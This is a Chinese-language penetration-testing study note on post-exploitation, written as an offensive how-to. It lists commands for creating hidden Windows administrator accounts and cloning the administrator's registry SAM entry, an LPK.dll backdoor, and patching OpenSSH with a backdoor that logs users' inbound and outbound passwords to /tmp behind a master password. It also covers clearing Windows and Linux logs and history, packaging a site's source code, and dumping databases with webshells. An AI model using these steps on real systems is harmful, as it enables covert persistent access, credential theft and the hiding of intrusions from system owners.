滲透測試學習 二十6、提權 遠控

後滲透

         留後門，方便下次入侵

         清理痕跡

         數據庫脫庫測試

         源碼打包

 

Windows後門安裝

         帳號後門（用戶後門）

         LPK後門（程序後門）

         木馬後門（程序後門）

 

帳號後門

         net user

         net user a$ a /add

         net localgrop administrators a /add

 

support_338945ao 克隆帳號 一、先設置密碼

打開註冊表 regedit

HKET_LOCAL_MACHINE-ASM-SAM-Domains-User-Name

找到管理員，打開管理員的F值，全複製

找到要克隆的帳號，打開F值，全選粘貼替換掉

 

爲何要克隆帳號

一、首次，在一個用戶登陸計算機時，會在c:\Documents and settings裏面有記錄

即建立一個帳號遠程登陸後，會建立一個家目錄，

但克隆後的帳號登陸後並不會有這種狀況。

 

LPK後門

         生成LPK.dll

 

木馬後門

 

Linux安裝後門

         tar zxvf openssh-5.9p1.tar.gz

         tar zxvf Ox06-0penssh-5.9p1.patch.tar.gz

         cd openssh-5.9p1.patch/

         cp sshbd5.9p1.diff ../openssh-5.9p1

         cd ../openssh-5.9p1

         patch < sshbd5.9p1.diff //patch 後門

         vi includes.h //修改後門密碼，記錄文件位置

         /*

         +#define ILOG 「/tmp/ilog」      //記錄登陸到本機的用戶名和密碼

         +#define OLOG 「/tmp/olog」             //記錄本機登陸到遠程的用戶名和密碼

         +#define  SECRETPW 「123456321」         //後門密碼

         */

 

先安裝所需環境

         yum install –y openssl openssl-devel pam-devel

         ./configure –prefix=/usr –sysconfdir=/etc/ssh –with-pam –with-kerberos5

注意，要是出現：

configure:error:*** zlib.h missing –please install first or check config.log

須要安裝zlib

yum install –y zlib zlib-devel    //http://sourceforge.net/projects/libpng/files/zlib/1.2.3/zlib-1.2.3.tar.gz/download

須要make clean

make && make install     //編譯和安裝

serrice sshd restart                   //重啓sshed

而後登陸

 

Windows系統日誌清除         

掃描/訪問日誌-都是和網站進行交互-記錄在訪問日誌

上傳後門-看文件日期            

個人電腦-管理-事件查看器-安全性-審覈成功

網站日誌-網站-屬性-日誌

文件目錄

 

Linux系統日誌清除

歷史命令

訪問日誌：

ls /var/log/httpd/access_log

ls /etc/httpd/logs/access_log

 

源碼打包

         asp+access     

         asp+sqlserver

         大馬中的服務器打包

 

脫庫

         菜刀、大馬、脫褲馬、、、